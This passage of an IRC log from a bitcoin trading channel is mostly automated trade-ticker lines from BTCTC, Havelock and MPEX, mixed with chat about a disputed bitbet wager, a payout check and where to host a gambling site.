25 ? Sep 01 18:26:18 [BTCTC] [ACTIVEMINING] 500 @ 0.003201 = 1.6005 BTC [+] Sep 01 18:26:19 [BTCTC] [ACTIVEMINING] 1500 @ 0.0032 = 4.8 BTC [-] Sep 01 18:26:35 I'm glad you could at least see both ends yourself --- but why can't they be annulled due to poor language? what if the admin accidently allows a bad bet, and only realizes its a bad bet afterwards? Sep 01 18:26:53 then the admin is stuck with a pain in the butt. Sep 01 18:27:04 [HAVELOCK] [AM1] 1 @ 2.4 BTC [-] Sep 01 18:27:08 [HAVELOCK] [AM1] 1 @ 2.245 BTC [-] Sep 01 18:27:11 [HAVELOCK] [AM1] 5 @ 2.2 = 11 BTC [-] Sep 01 18:28:05 and why. well because there have to be absolute limits on recourse in order for the system to be stable. that Sep 01 18:28:12 [BTCTC] [ACTIVEMINING] 115 @ 0.003201 = 0.3681 BTC [+] Sep 01 18:28:21 's why you can't be double jeopardied , even if it's fucking clear as day that you dun it. Sep 01 18:28:28 [BTCTC] [ACTIVEMINING] 10 @ 0.003201 = 0.032 BTC [+] Sep 01 18:28:29 [BTCTC] [ACTIVEMINING] 500 @ 0.0032 = 1.6 BTC [-] Sep 01 18:29:26 [BTCTC] [ACTIVEMINING] 108 @ 0.003163 = 0.3416 BTC [-] Sep 01 18:29:26 [BTCTC] [ACTIVEMINING] 27 @ 0.003159 = 0.0853 BTC [-] Sep 01 18:29:28 [BTCTC] [ACTIVEMINING] 10 @ 0.003151 = 0.0315 BTC [-] Sep 01 18:29:30 I'm glad there was at least a note on the bet that addressed the uncertaintly of it.... and even though fraud is a strong word -- you have thick skin, -- i think you've called every other exchange a scam/fraud at least a few times ;) Sep 01 18:29:38 so you can handle it. Sep 01 18:30:05 i don't give a shit lol Sep 01 18:30:11 [BTCTC] [DMS.MINING] 2 @ 0.002996 = 0.006 BTC [+] Sep 01 18:30:26 [BTCTC] [ACTIVEMINING] 8 @ 0.003203 = 0.0256 BTC [+] Sep 01 18:31:35 [BTCTC] [ACTIVEMINING] 34 @ 0.003158 = 0.1074 BTC [-] Sep 01 18:31:36 [BTCTC] [ACTIVEMINING] 27 @ 0.003154 = 0.0852 BTC [-] Sep 01 18:31:38 [BTCTC] [ACTIVEMINING] 10 @ 0.003151 = 0.0315 BTC [-] Sep 01 18:31:39 [BTCTC] [ACTIVEMINING] 95 @ 0.003123 = 0.2967 BTC [-] Sep 01 18:31:40 [BTCTC] [ACTIVEMINING] 130 @ 0.003121 = 0.4057 BTC [-] Sep 01 18:31:41 [BTCTC] [ACTIVEMINING] 520 @ 0.00312 = 1.6224 BTC [-] Sep 01 18:31:42 [BTCTC] [ACTIVEMINING] 140 @ 0.00312 = 0.4368 BTC [-] Sep 01 18:31:43 [BTCTC] [ACTIVEMINING] 55 @ 0.00312 = 0.1716 BTC [-] Sep 01 18:31:44 [BTCTC] [ACTIVEMINING] 1 @ 0.00312 BTC [-] Sep 01 18:31:45 [BTCTC] [ACTIVEMINING] 205 @ 0.003111 = 0.6378 BTC [-] Sep 01 18:31:46 [BTCTC] [ACTIVEMINING] 320 @ 0.00311 = 0.9952 BTC [-] Sep 01 18:31:47 [BTCTC] [ACTIVEMINING] 500 @ 0.00311 = 1.555 BTC [-] Sep 01 18:31:48 [BTCTC] [ACTIVEMINING] 790 @ 0.003101 = 2.4498 BTC [-] Sep 01 18:32:34 [BTCTC] [LABCOIN] 35 @ 0.003859 = 0.1351 BTC [-] Sep 01 18:32:35 [BTCTC] [LABCOIN] 3594 @ 0.00386 = 13.8728 BTC [+] Sep 01 18:32:50 [BTCTC] [ASICMINER-PT] 2 @ 2.451 = 4.902 BTC [-] Sep 01 18:34:24 [BTCTC] [DMS.MINING] 1 @ 0.002995 BTC [-] Sep 01 18:34:29 ok, no worries then ;) Sep 01 18:34:29 [MPEX] [S.MPOE] 9635 @ 0.00086135 = 8.2991 BTC [-] Sep 01 18:35:05 ;;nethash Sep 01 18:35:06 739297.579156 Sep 01 18:36:08 [BTCTC] [ACTIVEMINING] 95 @ 0.003104 = 0.2949 BTC [+] Sep 01 18:36:10 [BTCTC] [ACTIVEMINING] 905 @ 0.0031 = 2.8055 BTC [-] Sep 01 18:36:24 [BTCTC] [DMS.MINING] 2 @ 0.0028 = 0.0056 BTC [-] Sep 01 18:37:14 [BTCTC] [ASICMINER-PT] 15 @ 2.45 = 36.75 BTC [-] Sep 01 18:41:47 [HAVELOCK] [AM100] 8 @ 0.0228 = 0.1824 BTC [-] Sep 01 18:42:06 [HAVELOCK] [AM100] 1 @ 0.0227 BTC [-] Sep 01 18:42:24 [BTCTC] [DMS.MINING] 1 @ 0.002995 BTC [+] Sep 01 18:42:37 [BTCTC] [LABCOIN] 1500 @ 0.003865 = 5.7975 BTC [+] Sep 01 18:42:39 [BTCTC] [LABCOIN] 2150 @ 0.003875 = 8.3313 BTC [+] Sep 01 18:44:21 kakobrekla, about the payout http://bitbet.us/bet/302/bitcoin-standardized-protocol-approved-this-summer/ Sep 01 18:44:42 1EteoRKNYbNhhmFfsKnUSWRF3JUpKCcMnc should have got 2 payouts but got only one Sep 01 18:44:45 [BTCTC] [ACTIVEMINING] 3943 @ 0.0031 = 12.2233 BTC [-] Sep 01 18:44:49 as far as i see Sep 01 18:44:52 for fucks sake.... I just spend 30 mins making a post about this bet and it timed out when i clicked submit now i have to type again . for fucks sake. Sep 01 18:45:47 ;;calc 0.86010910+1.69073863 Sep 01 18:45:48 2.55084773 Sep 01 18:45:54 jurov https://blockchain.info/sl/tx/3412bfc49523a669c4e4173a4e5673a65fc68b40f62cb4ff7b057457e0b4adaa Sep 01 18:46:11 jurov they get added together Sep 01 18:46:32 you can't include two payments to the same address in the same block. Sep 01 18:46:33 hmmm.. blockchainshows only 0.87460091 Sep 01 18:46:41 in same tx Sep 01 18:46:45 bitcoind shows it together Sep 01 18:46:52 so it's okay Sep 01 18:47:11 where do you see 0.87? Sep 01 18:47:13 fractal scam. Sep 01 18:47:21 [BTCTC] [ACTIVEMINING] 501 @ 0.003244 = 1.6252 BTC [+] Sep 01 18:47:39 .087 is not yours Sep 01 18:47:47 nevermind, it's okay Sep 01 18:47:47 2.55084773 is Sep 01 18:47:49 yeah total scam.... I'll just type it again.... brb Sep 01 18:48:31 now i see i had the window too narrow and read previous row Sep 01 18:49:43 [BTCTC] [ACTIVEMINING] 153 @ 0.003249 = 0.4971 BTC [+] Sep 01 18:53:06 [BTCTC] [ACTIVEMINING] 22 @ 0.003249 = 0.0715 BTC [+] Sep 01 18:55:40 [BTCTC] [ASICMINER-PT] 2 @ 2.43 = 4.86 BTC [-] Sep 01 18:55:55 [MPEX] [S.MPOE] 515 @ 0.00086132 = 0.4436 BTC [-] Sep 01 18:56:00 [MPEX] [S.MPOE] 1298 @ 0.00086207 = 1.119 BTC [+] Sep 01 18:56:01 [MPEX] [S.MPOE] 9002 @ 0.00086207 = 7.7604 BTC [+] Sep 01 18:56:22 fractal: use the Lazarus Form Recovery extension next time Sep 01 18:56:39 or opera Sep 01 18:59:54 i vote for opera. Sep 01 19:00:10 opera is in fact so good that one time when i had lost an article i wrote someone emailed it to me two days later. Sep 01 19:00:12 [BTCTC] [LABCOIN] 1 @ 0.003744 BTC [-] Sep 01 19:00:48 was it the nsa Sep 01 19:01:04 no, it was thestringpuller Sep 01 19:05:43 [BTCTC] [LABCOIN] 1 @ 0.00375 BTC [+] Sep 01 19:06:25 [HAVELOCK] [XBOND] 1 @ 0.00112 BTC [-] Sep 01 19:06:41 [MPEX] [S.MPOE] 10450 @ 0.00086207 = 9.0086 BTC [+] Sep 01 19:06:47 [HAVELOCK] [XBOND] 250 @ 0.0011 = 0.275 BTC [-] Sep 01 19:08:13 The French government announced yesterday that it has raised its terror alert level from "Run" to "Hide." The only two higher levels in France are "Collaborate" and "Surrender." Sep 01 19:08:20 Italy has increased the alert level from "Shout Loudly and Excitedly" to "Elaborate Military Posturing." Two more levels remain: "Ineffective Combat Operations" and "Change Sides." Sep 01 19:09:06 [HAVELOCK] [CFIG] 3 @ 0.1668 = 0.5004 BTC [-] Sep 01 19:10:41 lol Sep 01 19:11:37 [HAVELOCK] [AM100] 3 @ 0.02427 = 0.0728 BTC [+] Sep 01 19:11:43 [BTCTC] [DMS.MINING] 96 @ 0.002777 = 0.2666 BTC [-] Sep 01 19:15:48 [BTCTC] [ACTIVEMINING] 26 @ 0.003105 = 0.0807 BTC [-] Sep 01 19:17:12 [BTCTC] [ACTIVEMINING] 500 @ 0.003199 = 1.5995 BTC [+] Sep 01 19:17:12 [BTCTC] [ACTIVEMINING] 500 @ 0.0032 = 1.6 BTC [+] Sep 01 19:18:18 [BTCTC] [LABCOIN] 100 @ 0.00383 = 0.383 BTC [+] Sep 01 19:18:57 [BTCTC] [DMS.MINING] 1 @ 0.002995 BTC [+] Sep 01 19:19:49 [BTCTC] [LABCOIN] 20 @ 0.003788 = 0.0758 BTC [-] Sep 01 19:19:50 [BTCTC] [LABCOIN] 180 @ 0.003871 = 0.6968 BTC [+] Sep 01 19:22:38 [BTCTC] [LABCOIN] 1 @ 0.00376 BTC [-] Sep 01 19:23:02 http://letstalkbitcoin.com/bitcoin-foundation-candidate-debate Sep 01 19:23:07 Bitcoin Foundation Candidate Debate | Lets Talk Bitcoin Sep 01 19:24:06 [BTCTC] [ACTIVEMINING] 630 @ 0.003108 = 1.958 BTC [-] Sep 01 19:24:07 [BTCTC] [ACTIVEMINING] 2570 @ 0.003109 = 7.9901 BTC [+] Sep 01 19:24:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.0229 = 0.229 BTC [-] Sep 01 19:24:59 [HAVELOCK] [XBOND] 10 @ 0.00107002 = 0.0107 BTC [-] Sep 01 19:25:16 [BTCTC] [ACTIVEMINING] 1000 @ 0.003108 = 3.108 BTC [-] Sep 01 19:25:25 [HAVELOCK] [XBOND] 85 @ 0.00107001 = 0.091 BTC [-] Sep 01 19:25:47 [HAVELOCK] [XBOND] 40 @ 0.00107 = 0.0428 BTC [-] Sep 01 19:25:53 [BTCTC] [DMS.SELLING] 2 @ 0.01299 = 0.026 BTC [+] Sep 01 19:26:03 [MPEX] [S.MPOE] 234 @ 0.00086207 = 0.2017 BTC [+] Sep 01 19:26:05 [MPEX] [S.MPOE] 11165 @ 0.0008633 = 9.6387 BTC [+] Sep 01 19:29:28 [BTCTC] [ACTIVEMINING] 5 @ 0.003101 = 0.0155 BTC [-] Sep 01 19:29:29 [BTCTC] [ACTIVEMINING] 5152 @ 0.0031 = 15.9712 BTC [-] Sep 01 19:31:20 [BTCTC] [DMS.SELLING] 1 @ 0.01299 BTC [+] Sep 01 19:31:22 [BTCTC] [DMS.SELLING] 50 @ 0.013 = 0.65 BTC [+] Sep 01 19:31:23 [BTCTC] [DMS.SELLING] 149 @ 0.01307 = 1.9474 BTC [+] Sep 01 19:31:46 [HAVELOCK] [XBOND] 2 @ 0.00107 = 0.0021 BTC [-] Sep 01 19:32:36 [BTCTC] [ACTIVEMINING] 18 @ 0.003035 = 0.0546 BTC [-] Sep 01 19:32:37 [BTCTC] [ACTIVEMINING] 72 @ 0.003034 = 0.2184 BTC [-] Sep 01 19:32:39 [BTCTC] [ACTIVEMINING] 25 @ 0.003031 = 0.0758 BTC [-] Sep 01 19:32:40 [BTCTC] [ACTIVEMINING] 100 @ 0.00303 = 0.303 BTC [-] Sep 01 19:32:41 [BTCTC] [ACTIVEMINING] 25 @ 0.003021 = 0.0755 BTC [-] Sep 01 19:32:42 [BTCTC] [ACTIVEMINING] 60 @ 0.00302 = 0.1812 BTC [-] Sep 01 19:33:20 [BTCTC] [DMS.MINING] 1 @ 0.002995 BTC [+] Sep 01 19:34:31 [BTCTC] [ACTIVEMINING] 18 @ 0.003243 = 0.0584 BTC [+] Sep 01 19:34:58 [BTCTC] [LABCOIN] 567 @ 0.003782 = 2.1444 BTC [+] Sep 01 19:35:00 [BTCTC] [LABCOIN] 10683 @ 0.00378 = 40.3817 BTC [-] Sep 01 19:36:41 [BTCTC] [ACTIVEMINING] 15 @ 0.003076 = 0.0461 BTC [-] Sep 01 19:36:43 [BTCTC] [ACTIVEMINING] 60 @ 0.003075 = 0.1845 BTC [-] Sep 01 19:36:43 [BTCTC] [ACTIVEMINING] 15 @ 0.003026 = 0.0454 BTC [-] Sep 01 19:36:44 [BTCTC] [ACTIVEMINING] 63 @ 0.003025 = 0.1906 BTC [-] Sep 01 19:36:45 [BTCTC] [ACTIVEMINING] 10 @ 0.003021 = 0.0302 BTC [-] Sep 01 19:36:47 [BTCTC] [ACTIVEMINING] 40 @ 0.00302 = 0.1208 BTC [-] Sep 01 19:36:48 [BTCTC] [ACTIVEMINING] 56 @ 0.003008 = 0.1684 BTC [-] Sep 01 19:36:49 [BTCTC] [ACTIVEMINING] 25 @ 0.003007 = 0.0752 BTC [-] Sep 01 19:36:50 [BTCTC] [ACTIVEMINING] 200 @ 0.003005 = 0.601 BTC [-] Sep 01 19:36:51 [BTCTC] [ACTIVEMINING] 516 @ 0.003002 = 1.549 BTC [-] Sep 01 19:36:59 [BTCTC] [ACTIVEMINING] 65 @ 0.003023 = 0.1965 BTC [+] Sep 01 19:37:01 [BTCTC] [ACTIVEMINING] 360 @ 0.003002 = 1.0807 BTC [-] Sep 01 19:37:01 [BTCTC] [ACTIVEMINING] 500 @ 0.003001 = 1.5005 BTC [-] Sep 01 19:37:02 [BTCTC] [ACTIVEMINING] 1 @ 0.003 BTC [-] Sep 01 19:37:03 [BTCTC] [ACTIVEMINING] 500 @ 0.003 = 1.5 BTC [-] Sep 01 19:37:05 [BTCTC] [ACTIVEMINING] 2 @ 0.003 = 0.006 BTC [-] Sep 01 19:37:06 [BTCTC] [ACTIVEMINING] 2500 @ 0.003 = 7.5 BTC [-] Sep 01 19:37:07 [BTCTC] [ACTIVEMINING] 1 @ 0.003 BTC [-] Sep 01 19:37:40 [BTCTC] [ACTIVEMINING] 400 @ 0.003 = 1.2 BTC [-] Sep 01 19:38:04 [BTCTC] [ACTIVEMINING] 267 @ 0.002999 = 0.8007 BTC [-] Sep 01 19:38:05 [BTCTC] [ACTIVEMINING] 233 @ 0.003 = 0.699 BTC [+] Sep 01 19:38:29 [BTCTC] [DMS.MINING] 3 @ 0.002899 = 0.0087 BTC [-] Sep 01 19:40:57 [BTCTC] [ACTIVEMINING] 151 @ 0.002999 = 0.4528 BTC [-] Sep 01 19:40:57 [BTCTC] [ACTIVEMINING] 302 @ 0.003 = 0.906 BTC [+] Sep 01 19:41:47 [HAVELOCK] [XBOND] 1 @ 0.001159 BTC [+] Sep 01 19:42:02 [BTCTC] [ACTIVEMINING] 4 @ 0.002974 = 0.0119 BTC [-] Sep 01 19:42:04 [HAVELOCK] [XBOND] 10 @ 0.00106661 = 0.0107 BTC [-] Sep 01 19:42:27 [BTCTC] [ACTIVEMINING] 37 @ 0.002972 = 0.11 BTC [-] Sep 01 19:42:28 [BTCTC] [ACTIVEMINING] 150 @ 0.002971 = 0.4457 BTC [-] Sep 01 19:42:29 [BTCTC] [DMS.MINING] 1316 @ 0.002899 = 3.8151 BTC [-] Sep 01 19:42:31 [HAVELOCK] [XBOND] 2 @ 0.0010666 = 0.0021 BTC [-] Sep 01 19:42:33 [BTCTC] [DMS.MINING] 180 @ 0.002995 = 0.5391 BTC [+] Sep 01 19:42:34 [BTCTC] [DMS.MINING] 370 @ 0.002997 = 1.1089 BTC [+] Sep 01 19:42:35 [BTCTC] [DMS.MINING] 96 @ 0.002997 = 0.2877 BTC [+] Sep 01 19:42:47 [HAVELOCK] [XBOND] 10 @ 0.00106 = 0.0106 BTC [-] Sep 01 19:43:21 [HAVELOCK] [XBOND] 2 @ 0.00105543 = 0.0021 BTC [-] Sep 01 19:43:26 [BTCTC] [LABCOIN] 502 @ 0.003785 = 1.9001 BTC [+] Sep 01 19:43:27 [BTCTC] [LABCOIN] 400 @ 0.003783 = 1.5132 BTC [-] Sep 01 19:43:29 [BTCTC] [LABCOIN] 100 @ 0.003783 = 0.3783 BTC [-] Sep 01 19:43:30 [BTCTC] [LABCOIN] 4467 @ 0.00378 = 16.8853 BTC [-] Sep 01 19:43:35 [BTCTC] [PETA-MINE] 100 @ 0.65 = 65 BTC [-] Sep 01 19:43:40 [HAVELOCK] [XBOND] 4 @ 0.00105235 = 0.0042 BTC [-] Sep 01 19:43:50 [BTCTC] [LABCOIN] 100 @ 0.00378 = 0.378 BTC [-] Sep 01 19:44:36 [HAVELOCK] [XBOND] 27 @ 0.00105011 = 0.0284 BTC [-] Sep 01 19:44:57 [HAVELOCK] [XBOND] 13 @ 0.00105011 = 0.0137 BTC [-] Sep 01 19:45:16 [HAVELOCK] [XBOND] 500 @ 0.0010501 = 0.5251 BTC [-] Sep 01 19:45:22 [BTCTC] [DMS.PURCHASE] 150 @ 0.01585 = 2.3775 BTC [-] Sep 01 19:46:02 [HAVELOCK] [CFIG] 3 @ 0.1667 = 0.5001 BTC [-] Sep 01 19:46:41 [BTCTC] [DMS.MINING] 295 @ 0.003 = 0.885 BTC [+] Sep 01 19:46:43 [BTCTC] [DMS.MINING] 35 @ 0.003 = 0.105 BTC [+] Sep 01 19:46:44 [BTCTC] [DMS.MINING] 70 @ 0.003 = 0.21 BTC [+] Sep 01 19:47:16 [BTCTC] [TAT.ASICMINER] 4 @ 0.02262 = 0.0905 BTC [-] Sep 01 19:52:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.02281 = 0.2281 BTC [+] Sep 01 19:52:21 [BTCTC] [TAT.ASICMINER] 40 @ 0.0228 = 0.912 BTC [-] Sep 01 19:52:26 [MPEX] [S.MPOE] 4348 @ 0.00085973 = 3.7381 BTC [-] Sep 01 19:59:32 yo assets - what are the good jurisdictions for hosting gambling web applications? Sep 01 19:59:41 ireland, somalia... Sep 01 20:00:20 sd was in ireland at some point Sep 01 20:01:56 where now? Sep 01 20:02:16 cyberspace! Sep 01 20:05:56 mircea_popescu: when will august div's be paid? Sep 01 20:06:08 today basically. Sep 01 20:09:50 lol Sep 01 20:10:58 [BTCTC] [DMS.MINING] 2 @ 0.002782 = 0.0056 BTC [-] Sep 01 20:10:59 [BTCTC] [DMS.MINING] 19 @ 0.002782 = 0.0529 BTC [-] Sep 01 20:13:31 [BTCTC] [ACTIVEMINING] 125 @ 0.002986 = 0.3733 BTC [+] Sep 01 20:13:54 [BTCTC] [ACTIVEMINING] 118 @ 0.002986 = 0.3523 BTC [+] Sep 01 20:14:04 [BTCTC] [ACTIVEMINING] 7 @ 0.002986 = 0.0209 BTC [+] Sep 01 20:14:18 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1999 = 0.3998 BTC [-] Sep 01 20:14:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.02281 = 0.0456 BTC [+] Sep 01 20:14:45 benkay just find a place that's reasonable to live in, has hot chicks and isn't an ally of the nazis. Sep 01 20:14:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.0228 = 0.228 BTC [-] Sep 01 20:15:01 costa rica, vietnam, gabon, the list is longer than my cock. Sep 01 20:15:01 [BTCTC] [LABCOIN] 1 @ 0.003848 BTC [+] Sep 01 20:15:13 mircea_popescu: why would i bother tying my personal location to the location of this instance? Sep 01 20:15:17 [BTCTC] [TAT.ASICMINER] 11 @ 0.02262 = 0.2488 BTC [-] Sep 01 20:15:20 sounds like 1940 Sep 01 20:15:30 because you don't want to live in a place you can't make a bitcoin gambling site anyway Sep 01 20:15:42 [BTCTC] [TAT.ASICMINER] 37 @ 0.02261 = 0.8366 BTC [-] Sep 01 20:15:45 just like you don't want to live in a place where you have to eat shit. Sep 01 20:15:57 i can make whatever software i want here Sep 01 20:16:02 so then go for it. Sep 01 20:16:06 but dat juris-my-diction Sep 01 20:16:35 [BTCTC] [BITVPS] 2 @ 0.002609 = 0.0052 BTC [+] Sep 01 20:16:45 [BTCTC] [PETA-MINE] 3 @ 0.65 = 1.95 BTC [-] Sep 01 20:16:46 [BTCTC] [DMS.PURCHASE] 320 @ 0.01585 = 5.072 BTC [-] Sep 01 20:17:41 [BTCTC] [DMS.SELLING] 286 @ 0.01307 = 3.738 BTC [+] Sep 01 20:18:22 [BTCTC] [DMS.SELLING] 400 @ 0.01308 = 5.232 BTC [+] Sep 01 20:18:35 [HAVELOCK] [CFIG] 1 @ 0.1669 BTC [+] Sep 01 20:18:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.02262 BTC [+] Sep 01 20:20:44 [MPEX] [S.MPOE] 11200 @ 0.00086008 = 9.6329 BTC [+] Sep 01 20:20:50 [BTCTC] [DMS.MINING] 225 @ 0.002781 = 0.6257 BTC [-] Sep 01 20:21:14 [HAVELOCK] [XBOND] 30 @ 0.00115 = 0.0345 BTC [+] Sep 01 20:21:56 [BTCTC] [DMS.MINING] 4 @ 0.003 = 0.012 BTC [+] Sep 01 20:24:07 [HAVELOCK] [AM100] 1 @ 0.022666 BTC [-] Sep 01 20:24:26 [HAVELOCK] [AM100] 6 @ 0.022501 = 0.135 BTC [-] Sep 01 20:24:52 [HAVELOCK] [AM100] 6 @ 0.02250001 = 0.135 BTC [-] Sep 01 20:26:00 [HAVELOCK] [CFIG] 1 @ 0.167 BTC [+] Sep 01 20:30:06 [HAVELOCK] [AM100] 3 @ 0.022501 = 0.0675 BTC [+] Sep 01 20:30:24 [HAVELOCK] [AM100] 45 @ 0.0225 = 1.0125 BTC [-] Sep 01 20:30:47 .d Sep 01 20:30:47 65750060.14908 | Next Diff in 512 blocks | Estimated Change: 28.1369% in 2d 13h 17m 42s Sep 01 20:31:36 [HAVELOCK] [CFIG] 3 @ 0.167 = 0.501 BTC [+] Sep 01 20:32:18 [HAVELOCK] [CFIG] 3 @ 0.167 = 0.501 BTC [+] Sep 01 20:32:40 [HAVELOCK] [LABCO] 7 @ 0.003 = 0.021 BTC [-] Sep 01 20:32:45 [BTCTC] [LABCOIN] 20 @ 0.003738 = 0.0748 BTC [-] Sep 01 20:32:47 [BTCTC] [LABCOIN] 110 @ 0.003735 = 0.4109 BTC [-] Sep 01 20:32:48 [BTCTC] [PETA-MINE] 2 @ 0.65 = 1.3 BTC [-] Sep 01 20:32:49 [BTCTC] [LABCOIN] 420 @ 0.003727 = 1.5653 BTC [-] Sep 01 20:32:56 [HAVELOCK] [LABCO] 10 @ 0.003 = 0.03 BTC [-] Sep 01 20:33:27 [BTCTC] [LABCOIN] 200 @ 0.00383 = 0.766 BTC [+] Sep 01 20:33:34 [HAVELOCK] [AM100] 3 @ 0.0222 = 0.0666 BTC [-] Sep 01 20:33:52 [HAVELOCK] [AM100] 10 @ 0.0221 = 0.221 BTC [-] Sep 01 20:34:14 [HAVELOCK] [AM100] 1 @ 0.0225 BTC [+] Sep 01 20:34:55 [HAVELOCK] [CFIG] 2 @ 0.167 = 0.334 BTC [+] Sep 01 20:35:21 [HAVELOCK] [XBOND] 10 @ 0.001159 = 0.0116 BTC [+] Sep 01 20:37:28 [HAVELOCK] [XBOND] 7 @ 0.00111 = 0.0078 BTC [-] Sep 01 20:37:56 [HAVELOCK] [AM100] 1 @ 0.02427 BTC [+] Sep 01 20:38:12 [HAVELOCK] [AM100] 1 @ 0.02204 BTC [-] Sep 01 20:38:30 [HAVELOCK] [AM100] 9 @ 0.022 = 0.198 BTC [-] Sep 01 20:38:49 [HAVELOCK] [XBOND] 5 @ 0.001159 = 0.0058 BTC [+] Sep 01 20:39:08 [HAVELOCK] [CFIG] 1 @ 0.167 BTC [+] Sep 01 20:39:49 [HAVELOCK] [AM100] 11 @ 0.02427 = 0.267 BTC [+] Sep 01 20:40:21 [HAVELOCK] [AM100] 5 @ 0.02428 = 0.1214 BTC [+] Sep 01 20:43:34 [BTCTC] [ASICMINER-PT] 2 @ 2.487 = 4.974 BTC [+] Sep 01 20:43:35 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [+] Sep 01 20:45:20 [MPEX] [S.MPOE] 10200 @ 0.00086008 = 8.7728 BTC [+] Sep 01 20:45:21 [MPEX] [S.MPOE] 1302 @ 0.00085973 = 1.1194 BTC [-] Sep 01 20:45:32 [MPEX] [S.MPOE] 1643 @ 0.00085907 = 1.4115 BTC [-] Sep 01 20:45:40 [BTCTC] [ASICMINER-PT] 1 @ 2.428 BTC [-] Sep 01 20:45:41 [BTCTC] [ASICMINER-PT] 1 @ 2.427 BTC [-] Sep 01 20:49:02 [HAVELOCK] [LABCO] 40 @ 0.003 = 0.12 BTC [-] Sep 01 20:49:13 [BTCTC] [LABCOIN] 20 @ 0.003728 = 0.0746 BTC [-] Sep 01 20:49:15 [BTCTC] [LABCOIN] 397 @ 0.003727 = 1.4796 BTC [-] Sep 01 20:49:16 [BTCTC] [LABCOIN] 150 @ 0.003725 = 0.5588 BTC [-] Sep 01 20:49:16 [BTCTC] [LABCOIN] 3500 @ 0.00371 = 12.985 BTC [-] Sep 01 20:49:18 [BTCTC] [LABCOIN] 100 @ 0.003709 = 0.3709 BTC [-] Sep 01 20:49:19 [BTCTC] [LABCOIN] 797 @ 0.003701 = 2.9497 BTC [-] Sep 01 20:49:28 [HAVELOCK] [AM100] 4 @ 0.02428 = 0.0971 BTC [+] Sep 01 20:49:42 [BTCTC] [DMS.MINING] 3 @ 0.002997 = 0.009 BTC [-] Sep 01 20:50:36 [BTCTC] [ACTIVEMINING] 12 @ 0.002994 = 0.0359 BTC [+] Sep 01 20:50:38 [BTCTC] [ACTIVEMINING] 50 @ 0.002993 = 0.1497 BTC [-] Sep 01 20:50:39 [BTCTC] [ACTIVEMINING] 1000 @ 0.00299 = 2.99 BTC [-] Sep 01 20:50:40 [BTCTC] [ACTIVEMINING] 802 @ 0.00299 = 2.398 BTC [-] Sep 01 20:50:42 [BTCTC] [ACTIVEMINING] 4000 @ 0.002989 = 11.956 BTC [-] Sep 01 20:50:43 [BTCTC] [ACTIVEMINING] 79 @ 0.002986 = 0.2359 BTC [-] Sep 01 20:50:43 [BTCTC] [ACTIVEMINING] 825 @ 0.002985 = 2.4626 BTC [-] Sep 01 20:50:53 [BTCTC] [DMS.SELLING] 1 @ 0.01309 BTC [+] Sep 01 20:51:22 [BTCTC] [LABCOIN] 2 @ 0.00372 = 0.0074 BTC [+] Sep 01 20:51:24 [MPEX] [S.MPOE] 5588 @ 0.0008561 = 4.7839 BTC [-] Sep 01 20:51:25 [MPEX] [S.MPOE] 865 @ 0.0008633 = 0.7468 BTC [+] Sep 01 20:52:21 [BTCTC] [LABCOIN] 352 @ 0.003717 = 1.3084 BTC [-] Sep 01 20:52:23 [BTCTC] [LABCOIN] 150 @ 0.003715 = 0.5573 BTC [-] Sep 01 20:52:24 [BTCTC] [LABCOIN] 186 @ 0.003701 = 0.6884 BTC [-] Sep 01 20:54:29 [BTCTC] [DMS.PURCHASE] 2 @ 0.01585 = 0.0317 BTC [-] Sep 01 20:55:05 [HAVELOCK] [CFIG] 1 @ 0.167 BTC [+] Sep 01 20:55:18 [BTCTC] [LABCOIN] 1 @ 0.003792 BTC [+] Sep 01 20:56:07 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0008475 BTC [+] Sep 01 20:57:41 [BTCTC] [DMS.PURCHASE] 1 @ 0.01585 BTC [-] Sep 01 20:59:04 [BTCTC] [NASTY-PT] 2 @ 0.00325 = 0.0065 BTC [+] Sep 01 20:59:44 [BTCTC] [LABCOIN] 2 @ 0.003792 = 0.0076 BTC [+] Sep 01 20:59:47 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0008473 BTC [-] Sep 01 21:04:34 [BTCTC] [BASIC-MINING] 2 @ 0.1798 = 0.3596 BTC [+] Sep 01 21:06:16 [BTCTC] [LABCOIN] 1 @ 0.003791 BTC [-] Sep 01 21:06:17 [BTCTC] [LABCOIN] 17 @ 0.003792 = 0.0645 BTC [+] Sep 01 21:06:19 [BTCTC] [LABCOIN] 20 @ 0.003793 = 0.0759 BTC [+] Sep 01 21:06:30 [BTCTC] [S.BBET-PT] 2 @ 0.0012 = 0.0024 BTC [-] Sep 01 21:09:19 [BTCTC] [LABCOIN] 20 @ 0.00379 = 0.0758 BTC [-] Sep 01 21:09:20 [BTCTC] [LABCOIN] 20 @ 0.003791 = 0.0758 BTC [+] Sep 01 21:09:20 [BTCTC] [LABCOIN] 90 @ 0.003798 = 0.3418 BTC [+] Sep 01 21:10:48 [BTCTC] [DMS.SELLING] 1 @ 0.0131 BTC [+] Sep 01 21:11:00 [BTCTC] [ACTIVEMINING] 25 @ 0.002996 = 0.0749 BTC [+] Sep 01 21:11:21 [BTCTC] [LABCOIN] 2 @ 0.003789 = 0.0076 BTC [-] Sep 01 21:13:28 [HAVELOCK] [HIM] 12 @ 0.159 = 1.908 BTC [-] Sep 01 21:14:03 [MPEX] [S.MPOE] 847 @ 0.00086342 = 0.7313 BTC [+] Sep 01 21:14:50 [BTCTC] [LABCOIN] 18 @ 0.003789 = 0.0682 BTC [-] Sep 01 21:14:52 [BTCTC] [LABCOIN] 20 @ 0.003798 = 0.076 BTC [+] Sep 01 21:16:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.02394 BTC [+] Sep 01 21:17:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.02394 BTC [+] Sep 01 21:20:23 [BTCTC] [LABCOIN] 1 @ 0.003786 BTC [-] Sep 01 21:22:03 [BTCTC] [LABCOIN] 19 @ 0.003786 = 0.0719 BTC [-] Sep 01 21:22:03 [BTCTC] [LABCOIN] 21 @ 0.003795 = 0.0797 BTC [+] Sep 01 21:22:19 [HAVELOCK] [SMG] 2 @ 0.00024299 = 0.0005 BTC [+] Sep 01 21:22:28 [BTCTC] [LABCOIN] 20 @ 0.003734 = 0.0747 BTC [-] Sep 01 21:22:29 [BTCTC] [LABCOIN] 100 @ 0.003733 = 0.3733 BTC [-] Sep 01 